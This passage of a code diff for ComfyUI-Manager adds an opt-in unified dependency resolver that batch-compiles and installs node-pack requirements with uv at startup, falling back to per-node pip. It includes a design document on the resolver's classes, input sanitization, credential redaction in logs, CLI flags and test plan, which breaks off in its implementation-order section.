lines = manager_util.robust_readlines(requirements_path)
@ -1604,6 +1607,7 @@ def write_config():
config['default'] = {
'git_exe': get_config()['git_exe'],
'use_uv': get_config()['use_uv'],
'use_unified_resolver': get_config()['use_unified_resolver'],
'channel_url': get_config()['channel_url'],
'share_option': get_config()['share_option'],
'bypass_ssl': get_config()['bypass_ssl'],
@ -1642,12 +1646,16 @@ def read_config():
return default_conf[key].lower() == 'true' if key in default_conf else False
manager_util.use_uv = default_conf['use_uv'].lower() == 'true' if 'use_uv' in default_conf else False
# Don't override use_unified_resolver here: prestartup_script.py already reads config
# and sets this flag, then may reset it to False on resolver fallback.
# Re-reading from config would undo the fallback.
manager_util.bypass_ssl = get_bool('bypass_ssl', False)
return {
'http_channel_enabled': get_bool('http_channel_enabled', False),
'git_exe': default_conf.get('git_exe', ''),
'use_uv': get_bool('use_uv', True),
'use_unified_resolver': get_bool('use_unified_resolver', False),
'channel_url': default_conf.get('channel_url', DEFAULT_CHANNEL),
'default_cache_as_channel_url': get_bool('default_cache_as_channel_url', False),
'share_option': default_conf.get('share_option', 'all').lower(),
@ -1668,12 +1676,14 @@ def read_config():
import importlib.util
# temporary disable `uv` on Windows by default (https://github.com/Comfy-Org/ComfyUI-Manager/issues/1969)
manager_util.use_uv = importlib.util.find_spec("uv") is not None and platform.system() != "Windows"
manager_util.use_unified_resolver = False
manager_util.bypass_ssl = False
return {
'http_channel_enabled': False,
'git_exe': '',
'use_uv': manager_util.use_uv,
'use_unified_resolver': False,
'channel_url': DEFAULT_CHANNEL,
'default_cache_as_channel_url': False,
'share_option': 'all',
@ -1871,7 +1881,6 @@ def __win_check_git_pull(path):
def execute_install_script(url, repo_path, lazy_mode=False, instant_execution=False, no_deps=False):
# import ipdb; ipdb.set_trace()
install_script_path = os.path.join(repo_path, "install.py")
requirements_path = os.path.join(repo_path, "requirements.txt")
@ -1879,7 +1888,10 @@ def execute_install_script(url, repo_path, lazy_mode=False, instant_execution=Fa
install_cmd = ["#LAZY-INSTALL-SCRIPT", sys.executable]
try_install_script(url, repo_path, install_cmd)
else:
if os.path.exists(requirements_path) and not no_deps:
if not no_deps and manager_util.use_unified_resolver:
# Unified mode: skip per-node pip install (deps resolved at startup batch)
logging.info("[UnifiedDepResolver] deps deferred to startup batch resolution for %s", repo_path)
elif os.path.exists(requirements_path) and not no_deps:
print("Install: pip packages")
pip_fixer = manager_util.PIPFixer(manager_util.get_installed_packages(), context.comfy_path, context.manager_files_path)
with open(requirements_path, "r") as requirements_file:

View File

@ -88,6 +88,11 @@ def read_uv_mode():
if 'use_uv' in default_conf:
manager_util.use_uv = default_conf['use_uv'].lower() == 'true'
def read_unified_resolver_mode():
if 'use_unified_resolver' in default_conf:
manager_util.use_unified_resolver = default_conf['use_unified_resolver'].lower() == 'true'
def check_file_logging():
global enable_file_logging
if 'file_logging' in default_conf and default_conf['file_logging'].lower() == 'false':
@ -96,9 +101,14 @@ def check_file_logging():
read_config()
read_uv_mode()
read_unified_resolver_mode()
security_check.security_check()
check_file_logging()
# Module-level flag set by startup batch resolver when it succeeds.
# Used by execute_lazy_install_script() to skip per-node pip installs.
_unified_resolver_succeeded = False
cm_global.pip_overrides = {}
if os.path.exists(manager_pip_overrides_path):
@ -581,7 +591,8 @@ def execute_lazy_install_script(repo_path, executable):
install_script_path = os.path.join(repo_path, "install.py")
requirements_path = os.path.join(repo_path, "requirements.txt")
if os.path.exists(requirements_path):
if os.path.exists(requirements_path) and not _unified_resolver_succeeded:
# Per-node pip install: only runs if unified resolver is disabled or failed
print(f"Install: pip packages for '{repo_path}'")
lines = manager_util.robust_readlines(requirements_path)
@ -751,6 +762,38 @@ def execute_startup_script():
print("#######################################################################\n")
# --- Unified dependency resolver: batch resolution at startup ---
# Runs unconditionally when enabled, independent of install-scripts.txt existence.
if manager_util.use_unified_resolver:
try:
from .common.unified_dep_resolver import (
UnifiedDepResolver,
UvNotAvailableError,
collect_base_requirements,
collect_node_pack_paths,
)
_resolver = UnifiedDepResolver(
node_pack_paths=collect_node_pack_paths(folder_paths.get_folder_paths('custom_nodes')),
base_requirements=collect_base_requirements(comfy_path),
blacklist=set(),
overrides={},
downgrade_blacklist=[],
)
_result = _resolver.resolve_and_install()
if _result.success:
_unified_resolver_succeeded = True
logging.info("[UnifiedDepResolver] startup batch resolution succeeded")
else:
manager_util.use_unified_resolver = False
logging.warning("[UnifiedDepResolver] startup batch failed: %s, falling back to per-node pip", _result.error)
except UvNotAvailableError:
manager_util.use_unified_resolver = False
logging.warning("[UnifiedDepResolver] uv not available at startup, falling back to per-node pip")
except Exception as e:
manager_util.use_unified_resolver = False
logging.warning("[UnifiedDepResolver] startup error: %s, falling back to per-node pip", e)
# Check if script_list_path exists
if os.path.exists(script_list_path):
execute_startup_script()

View File

@ -0,0 +1,812 @@
# Architecture Design: Unified Dependency Resolver
## 1. System Architecture
### 1.1 Module Location
```
comfyui_manager/
├── glob/
│ └── manager_core.py # Existing: execute_install_script() call sites (2 locations)
├── common/
│ ├── manager_util.py # Existing: get_pip_cmd(), PIPFixer, use_uv flag
│ ├── cm_global.py # Existing: pip_overrides, pip_blacklist (runtime dynamic assignment)
│ └── unified_dep_resolver.py # New: Unified dependency resolution module
├── prestartup_script.py # Existing: config reading, remap_pip_package, cm_global initialization
└── legacy/
└── manager_core.py # Legacy (not a modification target)
cm_cli/
└── __main__.py # CLI entry: uv-compile command (on-demand batch resolution)
```
The new module `unified_dep_resolver.py` is added to the `comfyui_manager/common/` directory.
It reuses `manager_util` utilities and `cm_global` global state from the same package.
> **Warning**: `cm_global.pip_overrides`, `pip_blacklist`, `pip_downgrade_blacklist` are
> NOT defined in `cm_global.py`. They are **dynamically assigned** during `prestartup_script.py` execution.
> In v1 unified mode, these are **not applied** — empty values are passed to the resolver constructor.
> The constructor interface accepts them for future extensibility (defaults to empty when `None`).
>
> **[DEFERRED]** Reading actual `cm_global` values at startup is deferred to a future version.
> The startup batch resolver in `prestartup_script.py` currently passes `blacklist=set()`,
> `overrides={}`, `downgrade_blacklist=[]`. The constructor and internal methods
> (`_remap_package`, `_is_downgrade_blacklisted`, blacklist check) are fully implemented
> and will work once real values are provided.
### 1.2 Overall Flow
```mermaid
flowchart TD
subgraph INSTALL_TIME["Install Time (immediate)"]
MC["manager_core.py<br/>execute_install_script() — 2 locations"]
MC -->|"use_unified_resolver=True"| SKIP["Skip per-node pip install<br/>(deps deferred to restart)"]
MC -->|"use_unified_resolver=False"| PIP["Existing pip install loop"]
SKIP --> INST["Run install.py"]
PIP --> INST
end
subgraph STARTUP["ComfyUI Restart (prestartup_script.py)"]
CHK{use_unified_resolver?}
CHK -->|Yes| UDR
CHK -->|No| LAZY["execute_lazy_install_script()<br/>per-node pip install (existing)"]
subgraph UDR["UnifiedDepResolver (batch)"]
S1["1. collect_requirements()<br/>(ALL installed node packs)"]
S2["2. compile_lockfile()"]
S3["3. install_from_lockfile()"]
S1 --> S2 --> S3
end
UDR -->|Success| FIX["PIPFixer.fix_broken()"]
UDR -->|Failure| LAZY
LAZY --> FIX2["PIPFixer.fix_broken()"]
end
```
> **Key design change**: The unified resolver runs at **startup time** (module scope), not at install time.
> At install time, `execute_install_script()` skips the pip loop when unified mode is active.
> At startup, `prestartup_script.py` runs the resolver at module scope — unconditionally when enabled,
> independent of `install-scripts.txt` existence. Blacklist/overrides/downgrade_blacklist are bypassed
> (empty values passed); `uv pip compile` handles all conflict resolution natively.
>
> **Note**: `execute_install_script()` exists in 2 locations in the codebase (excluding legacy module).
> - `UnifiedManager.execute_install_script()` (class method): Used for CNR installs, etc.
> - Standalone function `execute_install_script()`: Used for updates, git installs, etc.
> Both skip per-node pip install when unified mode is active.
### 1.3 uv Command Strategy
**`uv pip compile`** → Generates pinned requirements.txt (pip-compatible)
- Do not confuse with `uv lock`
- `uv lock` generates `uv.lock` (TOML) — cross-platform but incompatible with pip workflows
- This design uses a pip-compatible workflow (`uv pip compile` → `uv pip install -r`)
**`uv pip install -r`** ← Used instead of `uv pip sync`
- `uv pip sync`: **Deletes** packages not in lockfile → Risk of removing torch, ComfyUI deps
- `uv pip install -r`: Only performs additive installs, preserves existing packages → Safe
---
## 2. Class Design
### 2.1 UnifiedDepResolver
```python
class UnifiedDepResolver:
"""
Unified dependency resolver.
Resolves and installs all dependencies of (installed node packs + new node packs)
at once using uv.
Responsibility scope: Dependency resolution and installation only.
install.py execution and PIPFixer calls are handled by the caller (manager_core).
"""
def __init__(
self,
node_pack_paths: list[str],
base_requirements: list[str] | None = None,
blacklist: set[str] | None = None,
overrides: dict[str, str] | None = None,
downgrade_blacklist: list[str] | None = None,
):
"""
Args:
node_pack_paths: List of node pack directory paths
base_requirements: Base dependencies (ComfyUI requirements, etc.)
blacklist: Blacklisted package set (default: empty set; not applied in v1 unified mode)
overrides: Package name remapping dict (default: empty dict; not applied in v1 unified mode)
downgrade_blacklist: Downgrade-prohibited package list (default: empty list; not applied in v1 unified mode)
"""
def resolve_and_install(self) -> ResolveResult:
"""Execute full pipeline: stale cleanup → collect → compile → install.
Calls cleanup_stale_tmp() at start to clean up residual files from previous abnormal terminations."""
def collect_requirements(self) -> CollectedDeps:
"""Collect dependencies from all node packs"""
def compile_lockfile(self, deps: CollectedDeps) -> LockfileResult:
"""Generate pinned requirements via uv pip compile"""
def install_from_lockfile(self, lockfile_path: str) -> InstallResult:
"""Install from pinned requirements (uv pip install -r)"""
```
### 2.2 Data Classes
```python
@dataclass
class PackageRequirement:
"""Individual package dependency"""
name: str # Package name (normalized)
spec: str # Original spec (e.g., "torch>=2.0")
source: str # Source node pack path
@dataclass
class CollectedDeps:
"""All collected dependencies"""
requirements: list[PackageRequirement] # Collected deps (duplicates allowed, uv resolves)
skipped: list[tuple[str, str]] # (package_name, skip_reason)
sources: dict[str, list[tuple[str, str]]] # {package_name: [(pack_path, pkg_spec), ...]}
"""pkg_name → [(pack_path, pkg_spec), ...] — tracks which node packs request each package."""
extra_index_urls: list[str] # Additional index URLs separated from --index-url entries
@dataclass
class LockfileResult:
"""Compilation result"""
success: bool
lockfile_path: str | None # pinned requirements.txt path
conflicts: list[str] # Conflict details
stderr: str # uv error output
@dataclass
class InstallResult:
"""Installation result (uv pip install -r is atomic: all-or-nothing)"""
success: bool
installed: list[str] # Installed packages (stdout parsing)
skipped: list[str] # Already installed (stdout parsing)
stderr: str # uv stderr output (for failure analysis)
@dataclass
class ResolveResult:
"""Full pipeline result"""
success: bool
collected: CollectedDeps | None
lockfile: LockfileResult | None
install: InstallResult | None
error: str | None
```
---
## 3. Core Logic Details
### 3.1 Dependency Collection (`collect_requirements`)
```python
# Input sanitization: dangerous patterns to reject
_DANGEROUS_PATTERNS = re.compile(
r'^(-r\b|--requirement\b|-e\b|--editable\b|-c\b|--constraint\b'
r'|--find-links\b|-f\b|.*@\s*file://)',
re.IGNORECASE
)
def collect_requirements(self) -> CollectedDeps:
requirements = []
skipped = []
sources = defaultdict(list)
extra_index_urls = []
for path in self.node_pack_paths:
# Exclude disabled node packs (directory-based mechanism)
# Disabled node packs are actually moved to custom_nodes/.disabled/,
# so they should already be excluded from input at this point.
# Defensive check: new style (.disabled/ directory) + old style ({name}.disabled suffix)
if ('/.disabled/' in path
or os.path.basename(os.path.dirname(path)) == '.disabled'
or path.rstrip('/').endswith('.disabled')):
continue
req_file = os.path.join(path, "requirements.txt")
if not os.path.exists(req_file):
continue
# chardet-based encoding detection (existing robust_readlines pattern)
for line in self._read_requirements(req_file):
line = line.split('#')[0].strip()
if not line:
continue
# 0. Input sanitization (security)
if self._DANGEROUS_PATTERNS.match(line):
skipped.append((line, f"rejected: dangerous pattern in {path}"))
logging.warning(f"[UnifiedDepResolver] rejected dangerous line: '{line}' from {path}")
continue
# 1. Separate --index-url / --extra-index-url handling
# (BEFORE path separator check, because URLs contain '/')
if '--index-url' in line or '--extra-index-url' in line:
pkg_spec, index_url = self._split_index_url(line)
if index_url:
extra_index_urls.append(index_url)
line = pkg_spec
if not line:
# Standalone option line (no package prefix)
continue
# 1b. Reject path separators in package name portion
pkg_name_part = re.split(r'[><=!~;]', line)[0]
if '/' in pkg_name_part or '\\' in pkg_name_part:
skipped.append((line, f"rejected: path separator in package name"))
continue
# 2. Apply remap_pip_package (using cm_global.pip_overrides)
pkg_spec = self._remap_package(line)
# 3. Blacklist check (cm_global.pip_blacklist)
pkg_name = self._extract_package_name(pkg_spec)
if pkg_name in self.blacklist:
skipped.append((pkg_spec, "blacklisted"))
continue
# 4. Downgrade blacklist check (includes version comparison)
if self._is_downgrade_blacklisted(pkg_name, pkg_spec):
skipped.append((pkg_spec, "downgrade blacklisted"))
continue
# 5. Collect (no dedup — uv handles resolution)
req = PackageRequirement(
name=pkg_name,
spec=pkg_spec,
source=path,
)
requirements.append(req)
sources[pkg_name].append((path, pkg_spec))
return CollectedDeps(
requirements=requirements,
skipped=skipped,
sources=dict(sources),
extra_index_urls=list(set(extra_index_urls)), # Deduplicate
)
def _split_index_url(self, line: str) -> tuple[str, str | None]:
"""Split 'package_name --index-url URL' → (package_name, URL).
Also handles standalone ``--index-url URL`` and
``--extra-index-url URL`` lines (with no package prefix).
"""
# Handle --extra-index-url first (contains '-index-url' as substring
# but NOT '--index-url' due to the extra-index prefix)
for option in ('--extra-index-url', '--index-url'):
if option in line:
parts = line.split(option, 1)
pkg_spec = parts[0].strip()
url = parts[1].strip() if len(parts) == 2 else None
return pkg_spec, url
return line, None
def _is_downgrade_blacklisted(self, pkg_name: str, pkg_spec: str) -> bool:
"""Reproduce the downgrade version comparison from existing is_blacklisted() logic.
Same logic as manager_core.py's is_blacklisted():
- No version spec and already installed → block (prevent reinstall)
- Operator is one of ['<=', '==', '<', '~='] and
installed version >= requested version → block (prevent downgrade)
- Version comparison uses manager_util.StrictVersion (NOT packaging.version)
"""
if pkg_name not in self.downgrade_blacklist:
return False
installed_packages = manager_util.get_installed_packages()
# Version spec parsing (same pattern as existing is_blacklisted())
pattern = r'([^<>!~=]+)([<>!~=]=?)([^ ]*)'
match = re.search(pattern, pkg_spec)
if match is None:
# No version spec: prevent reinstall if already installed
if pkg_name in installed_packages:
return True
elif match.group(2) in ['<=', '==', '<', '~=']:
# Downgrade operator: block if installed version >= requested version
if pkg_name in installed_packages:
try:
installed_ver = manager_util.StrictVersion(installed_packages[pkg_name])
requested_ver = manager_util.StrictVersion(match.group(3))
if installed_ver >= requested_ver:
return True
except (ValueError, TypeError):
logging.warning(f"[UnifiedDepResolver] version parse failed: {pkg_spec}")
return False
return False
def _remap_package(self, pkg: str) -> str:
"""Package name remapping based on cm_global.pip_overrides.
Reuses existing remap_pip_package() logic."""
if pkg in self.overrides:
remapped = self.overrides[pkg]
logging.info(f"[UnifiedDepResolver] '{pkg}' remapped to '{remapped}'")
return remapped
return pkg
```
### 3.2 Lockfile Generation (`compile_lockfile`)
**Behavior:**
1. Create a unique temp directory (`tempfile.mkdtemp(prefix="comfyui_resolver_")`) for concurrency safety
2. Write collected requirements and base constraints to temp files
3. Execute `uv pip compile` with options:
- `--output-file` (pinned requirements path within temp dir)
- `--python` (current interpreter)
- `--constraint` (base dependencies)
- `--extra-index-url` (from `CollectedDeps.extra_index_urls`, logged via `_redact_url()`)
4. Timeout: 300s — returns `LockfileResult(success=False)` on `TimeoutExpired`
5. On `returncode != 0`: parse stderr for conflict details via `_parse_conflicts()`
6. Post-success verification: confirm lockfile was actually created (handles edge case of `returncode==0` without output)
7. Temp directory cleanup: `shutil.rmtree()` in `except` block; on success, caller (`resolve_and_install`'s `finally`) handles cleanup
### 3.3 Dependency Installation (`install_from_lockfile`)
**Behavior:**
1. Execute `uv pip install --requirement <lockfile_path> --python <sys.executable>`
- **NOT `uv pip sync`** — sync deletes packages not in lockfile (dangerous for torch, ComfyUI deps)
2. `uv pip install -r` is **atomic** (all-or-nothing): no partial failure
3. Timeout: 600s — returns `InstallResult(success=False)` on `TimeoutExpired`
4. On success: parse stdout via `_parse_install_output()` to populate `installed`/`skipped` lists
5. On failure: `stderr` captures the failure cause; `installed=[]` (atomic model)
### 3.4 uv Command Resolution
**`_get_uv_cmd()` resolution order** (mirrors existing `get_pip_cmd()` pattern):
1. **Module uv**: `[sys.executable, '-m', 'uv']` (with `-s` flag for embedded Python — note: `python_embeded` spelling is intentional, matching ComfyUI Windows distribution path)
2. **Standalone uv**: `['uv']` via `shutil.which('uv')`
3. **Not found**: raises `UvNotAvailableError` → caught by caller for pip fallback
### 3.5 Stale Temp File Cleanup
**`cleanup_stale_tmp(max_age_seconds=3600)`** — classmethod, called at start of `resolve_and_install()`:
- Scans `tempfile.gettempdir()` for directories with prefix `comfyui_resolver_`
- Deletes directories older than `max_age_seconds` (default: 1 hour)
- Silently ignores `OSError` (permission issues, etc.)
### 3.6 Credential Redaction
```python
_CREDENTIAL_PATTERN = re.compile(r'://([^@]+)@')
def _redact_url(self, url: str) -> str:
"""Mask authentication info in URLs. user:pass@host → ****@host"""
return self._CREDENTIAL_PATTERN.sub('://****@', url)
```
All `--extra-index-url` logging passes through `_redact_url()`:
```python
# Logging example within compile_lockfile()
for url in deps.extra_index_urls:
logging.info(f"[UnifiedDepResolver] extra-index-url: {self._redact_url(url)}")
cmd += ["--extra-index-url", url] # Original URL passed to actual command
```
---
## 4. Existing Code Integration
### 4.1 manager_core.py Modification Points
**2 `execute_install_script()` locations — both skip deps in unified mode:**
#### 4.1.1 UnifiedManager.execute_install_script() (Class Method)
#### 4.1.2 Standalone Function execute_install_script()
**Both locations use the same pattern when unified mode is active:**
1. `lazy_mode=True` → schedule and return early (unchanged)
2. If `not no_deps and manager_util.use_unified_resolver`:
- **Skip** the `requirements.txt` pip install loop entirely (deps deferred to startup)
- Log: `"[UnifiedDepResolver] deps deferred to startup batch resolution"`
3. If `not manager_util.use_unified_resolver`: existing pip install loop runs (unchanged)
4. `install.py` execution: **always runs immediately** regardless of resolver mode
> **Parameter ordering differs:**
> - Method: `(self, url, repo_path, instant_execution, lazy_mode, no_deps)`
> - Standalone: `(url, repo_path, lazy_mode, instant_execution, no_deps)`
### 4.1.3 Startup Batch Resolver (`prestartup_script.py`)
**New**: Runs unified resolver at **module scope** — unconditionally when enabled, independent of `install-scripts.txt` existence.
**Execution point**: After config reading and `cm_global` initialization, **before** the `execute_startup_script()` gate.
**Logic** (uses module-level helpers from `unified_dep_resolver.py`):
1. `collect_node_pack_paths(folder_paths.get_folder_paths('custom_nodes'))` — enumerate all installed node pack directories
2. `collect_base_requirements(comfy_path)` — read `requirements.txt` + `manager_requirements.txt` from ComfyUI root (base deps only)
3. Create `UnifiedDepResolver` with **empty** blacklist/overrides/downgrade_blacklist (uv handles resolution natively; interface preserved for extensibility)
4. Call `resolve_and_install()` → on success set `_unified_resolver_succeeded = True`
5. On failure (including `UvNotAvailableError`): log warning, fall back to per-node pip
> `manager_requirements.txt` is read **only** from `comfy_path` (ComfyUI base), never from node packs.
> Node packs' `requirements.txt` are collected by the resolver's `collect_requirements()` method.
### 4.1.5 `execute_lazy_install_script()` Modification
When unified resolver **succeeds**, `execute_lazy_install_script()` skips the per-node pip install loop
(deps already batch-resolved at module scope). `install.py` still runs per node pack.
```python
# In execute_lazy_install_script():
if os.path.exists(requirements_path) and not _unified_resolver_succeeded:
# Per-node pip install: only runs if unified resolver is disabled or failed
...
# install.py always runs regardless
```
> **Note**: Gated on `_unified_resolver_succeeded` (success flag), NOT `use_unified_resolver` (enable flag).
> If the resolver is enabled but fails, `_unified_resolver_succeeded` remains False → per-node pip runs as fallback.
### 4.1.6 CLI Integration
Multiple entry points expose the unified resolver in `cm_cli`:
#### 4.1.6.1 Standalone Command: `cm_cli uv-compile`
On-demand batch resolution — independent of ComfyUI startup.
```bash
cm_cli uv-compile [--user-directory DIR]
```
Resolves all installed node packs' dependencies at once. Useful for environment
recovery or initial setup without starting ComfyUI.
`PIPFixer.fix_broken()` runs after resolution (via `finally` — runs on both success and failure).
#### 4.1.6.2 Install Flag: `cm_cli install --uv-compile`
```bash
cm_cli install <node1> [node2 ...] --uv-compile [--mode remote]
```
When `--uv-compile` is set:
1. `no_deps` is forced to `True` → per-node pip install is skipped during each node installation
2. After **all** nodes are installed, runs unified batch resolution over **all installed node packs**
(not just the newly installed ones — `uv pip compile` needs the complete dependency graph)
3. `PIPFixer.fix_broken()` runs after resolution (via `finally` — runs on both success and failure)
This differs from per-node pip install: instead of resolving each node pack's
`requirements.txt` independently, all deps are compiled together to avoid conflicts.
#### 4.1.6.3 Additional `--uv-compile` Commands
The following commands follow the same `no_deps` + batch-resolve pattern as `install --uv-compile`:
`cmd_ctx.set_no_deps(True)` is set before node operations, then `_run_unified_resolve()`
runs at the end via `try/finally` with `PIPFixer.fix_broken()`.
| Command | Operation |
|---------|-----------|
| `cm_cli reinstall --uv-compile` | Reinstall nodes then batch-resolve |
| `cm_cli update --uv-compile` | Update nodes then batch-resolve |
| `cm_cli fix --uv-compile` | Fix node dependencies then batch-resolve |
| `cm_cli restore-snapshot --uv-compile` | Restore snapshot then batch-resolve |
| `cm_cli restore-dependencies --uv-compile` | Restore all node deps then batch-resolve |
| `cm_cli install-deps <deps.json> --uv-compile` | Install from deps spec file then batch-resolve |
> **`reinstall` only**: Has `--uv-compile` / `--no-deps` mutual exclusion check.
> Both skip per-node pip, but `--no-deps` skips permanently while `--uv-compile` also
> triggers batch resolution after all nodes are processed.
>
> **`restore-snapshot` only**: Has an additional pre-resolution exception guard — if the
> snapshot restore itself fails (before `_run_unified_resolve()` is reached),
> `PIPFixer.fix_broken()` runs in the exception handler before exit. The `try/finally`
> applies to the `_run_unified_resolve()` call. See dec_7 for rationale.
#### Shared Design Decisions
- **Uses real `cm_global` values**: Unlike the startup path (4.1.3) which passes empty
blacklist/overrides, CLI commands pass `cm_global.pip_blacklist`,
`cm_global.pip_overrides`, and `cm_global.pip_downgrade_blacklist` — already
initialized at `cm_cli/__main__.py` module scope.
- **No `_unified_resolver_succeeded` flag**: Not needed — these are one-shot commands,
not startup gates.
- **Shared helper**: All entry points delegate to `_run_unified_resolve()` which
handles resolver instantiation, execution, and result reporting.
- **Error handling**: `UvNotAvailableError` / `ImportError` → exit 1 with message.
All entry points guarantee `PIPFixer.fix_broken()` runs regardless of outcome —
via `try/finally` around `_run_unified_resolve()`. `restore-snapshot` additionally
calls `fix_broken()` in the snapshot restore exception handler (before
`_run_unified_resolve()` is reached), per dec_7.
- **Conflict attribution output**: When resolution fails and `result.lockfile.conflicts`
is non-empty, `_run_unified_resolve()` cross-references conflict package names with
`CollectedDeps.sources` to identify which node packs requested each conflicting package:
- Normalization: both sources keys and conflict text apply `.lower().replace("-", "_")`
- Word-boundary regex `(?<![a-z0-9_])pkg(?![a-z0-9_])` prevents false-positive prefix
matches (e.g., `torch` does NOT match `torch_audio` or `torchvision`)
- Output format: sorted by package name, each entry lists `pack_basename → pkg_spec`
per requester (using `CollectedDeps.sources` tuple values `(pack_path, pkg_spec)`)
**Node pack discovery**: Uses `cmd_ctx.get_custom_nodes_paths()``collect_node_pack_paths()`,
which is the CLI-native path resolution (respects `--user-directory` and `folder_paths`).
### 4.2 Configuration Addition (config.ini)
```ini
[default]
# Existing settings...
use_unified_resolver = false # Enable unified dependency resolution
```
### 4.3 Configuration Reading
Follows the existing `read_uv_mode()` / `use_uv` pattern:
- `prestartup_script.py`: `read_unified_resolver_mode()` reads from `default_conf` → sets `manager_util.use_unified_resolver`
- `manager_core.py`: `read_config()` / `write_config()` / `get_config()` include `use_unified_resolver` key
- `read_config()` exception fallback must include `use_unified_resolver` key to prevent `KeyError` in `write_config()`
### 4.4 manager_util.py Extension
```python
# manager_util.py
use_unified_resolver = False # New global flag (separate from use_uv)
```
---
## 5. Error Handling Strategy
```mermaid
flowchart TD
STARTUP["prestartup_script.py startup"]
STARTUP --> CHK{use_unified_resolver?}
CHK -->|No| SKIP_UDR["Skip → execute_lazy_install_script per-node pip"]
CHK -->|Yes| RAI["run_unified_resolver()"]
RAI --> STALE["cleanup_stale_tmp()<br/>Clean stale temp dirs (>1 hour old)"]
STALE --> UV_CHK{uv installed?}
UV_CHK -->|No| UV_ERR["UvNotAvailableError<br/>→ Fallback: execute_lazy_install_script per-node pip"]
UV_CHK -->|Yes| CR["collect_requirements()<br/>(ALL installed node packs)"]
CR --> CR_DIS[".disabled/ path → auto-skip"]
CR --> CR_PARSE["Parse failure → skip node pack, continue"]
CR --> CR_ENC["Encoding detection failure → assume UTF-8"]
CR --> CR_DANGER["Dangerous pattern detected → reject line + log"]
CR --> CR_DG["Downgrade blacklist → skip after version comparison"]
CR --> CL["compile_lockfile()"]
CL --> CL_CONFLICT["Conflict → report + per-node pip fallback"]
CL --> CL_TIMEOUT["TimeoutExpired 300s → per-node pip fallback"]
CL --> CL_NOFILE["Lockfile not created → failure + fallback"]
CL --> CL_TMP["Temp directory → finally block cleanup"]
CL -->|Success| IL["install_from_lockfile()"]
IL --> IL_OK["Total success → parse installed/skipped"]
IL --> IL_FAIL["Total failure → stderr + per-node pip fallback (atomic)"]
IL --> IL_TIMEOUT["TimeoutExpired 600s → fallback"]
IL_OK --> PF["PIPFixer.fix_broken()<br/>Restore torch/opencv/frontend"]
PF --> LAZY["execute_lazy_install_script()<br/>(install.py only, deps skipped)"]
```
> **Fallback model**: On resolver failure at startup, `execute_lazy_install_script()` runs normally
> (per-node pip install), providing the same behavior as if unified mode were disabled.
---
## 6. File Structure
### 6.1 New Files
```
comfyui_manager/common/unified_dep_resolver.py # Main module (~350 lines, includes sanitization/downgrade logic)
tests/test_unified_dep_resolver.py # Unit tests
```
### 6.2 Modified Files
```
comfyui_manager/glob/manager_core.py # Skip per-node pip in unified mode (2 execute_install_script locations)
comfyui_manager/common/manager_util.py # Add use_unified_resolver flag
comfyui_manager/prestartup_script.py # Config reading + startup batch resolver + execute_lazy_install_script modification
```
> **Not modified**: `comfyui_manager/legacy/manager_core.py` (legacy paths retain existing pip behavior)
---
## 7. Dependencies
| Dependency | Purpose | Notes |
|-----------|---------|-------|
| `uv` | Dependency resolution and installation | Already included in project dependencies |
| `cm_global` | pip_overrides, pip_blacklist, pip_downgrade_blacklist | Reuse existing global state (runtime dynamic assignment) |
| `manager_util` | StrictVersion, get_installed_packages, use_unified_resolver flag | Reuse existing utilities |
| `tempfile` | Temporary requirements files, mkdtemp | Standard library |
| `subprocess` | uv process execution | Standard library |
| `dataclasses` | Result data structures | Standard library |
| `re` | Input sanitization, version spec parsing, credential redaction | Standard library |
| `shutil` | uv lookup (`which`), temp directory cleanup | Standard library |
| `time` | Stale temp file age calculation | Standard library |
| `logging` | Per-step logging | Standard library |
No additional external dependencies.
---
## 8. Sequence Diagram
### Install Time + Startup Batch Resolution
```mermaid
sequenceDiagram
actor User
participant MC as manager_core
participant PS as prestartup_script
participant UDR as UnifiedDepResolver
participant UV as uv (CLI)
Note over User,MC: Install Time (immediate)
User->>MC: Install node pack X
MC->>MC: Git clone / download X
MC->>MC: Skip per-node pip (unified mode)
MC->>MC: Run X's install.py
MC-->>User: Node pack installed (deps pending)
Note over User,UV: ComfyUI Restart
User->>PS: Start ComfyUI
PS->>PS: Check use_unified_resolver
PS->>UDR: Create resolver (module scope)
UDR->>UDR: collect_requirements()<br/>(ALL installed node packs)
UDR->>UV: uv pip compile --output-file
UV-->>UDR: pinned reqs.txt
UDR->>UV: uv pip install -r
UV-->>UDR: Install result
UDR-->>PS: ResolveResult(success=True)
PS->>PS: PIPFixer.fix_broken()
PS->>PS: execute_lazy_install_script()<br/>(install.py only, deps skipped)
PS-->>User: ComfyUI ready
```
---
## 9. Test Strategy
### 9.1 Unit Tests
| Test Target | Cases |
|------------|-------|
| `collect_requirements` | Normal parsing, empty file, blacklist filtering, comment handling, remap application |
| `.disabled` filtering | Exclude node packs within `.disabled/` directory path (directory-based mechanism) |
| Input sanitization | Reject lines with `-r`, `-e`, `--find-links`, `@ file://`, path separators |
| `--index-url` / `--extra-index-url` separation | `package --index-url URL`, standalone `--index-url URL`, standalone `--extra-index-url URL`, `package --extra-index-url URL` → package spec + extra_index_urls separation |
| Downgrade blacklist | Installed + lower version request → skip, not installed → pass, same/higher version → pass |
| `compile_lockfile` | Normal compilation, conflict detection, TimeoutExpired, constraint application, --output-file verification |
| Lockfile existence verification | Failure handling when file not created despite returncode==0 |
| `extra_index_urls` passthrough | Verify `--extra-index-url` argument included in compile command |
| `install_from_lockfile` | Normal install, total failure, TimeoutExpired |
| Atomic model | On failure: installed=[], stderr populated |
| `_get_uv_cmd` | Module uv, standalone uv, embedded python (`python_embeded`), not installed |
| `_remap_package` | pip_overrides remapping, unregistered packages |
| Blacklist | torch family, torchsde, custom blacklist |
| Duplicate handling | Same package with multiple specs → all passed to uv |
| Multiple paths | Collection from multiple custom_nodes paths |
| `cm_global` defense | Default values used when `pip_blacklist` etc. not assigned |
| Concurrency | Two resolver instances each use unique temp directories |
| Credential redaction | `user:pass@host` URL masked in log output |
| `_redact_url` | `://user:pass@host``://****@host` conversion, no-credential URL passthrough |
| `cleanup_stale_tmp` | Delete stale dirs >1 hour, preserve recent dirs, ignore permission errors |
| Downgrade operators | `<=`, `==`, `<`, `~=` blocked; `>=`, `>`, `!=` pass; no spec + installed → blocked |
| `StrictVersion` comparison | Verify `manager_util.StrictVersion` is used (not `packaging.version`) |
### 9.2 Integration Tests
- End-to-end test in real uv environment
- Existing pip fallback path test
- config.ini setting toggle test
- Environment integrity verification after PIPFixer call
- lazy_mode scheduling behavior verification (Windows simulation)
- `use_uv=False` + `use_unified_resolver=True` combination test
- Large-scale dependency (50+ node packs) performance test
---
## 10. Implementation Order
1. **Phase 1**: Data classes and `collect_requirements` implementation + tests
- PackageRequirement, CollectedDeps (including extra_index_urls) and other data classes
- Blacklist/override filtering
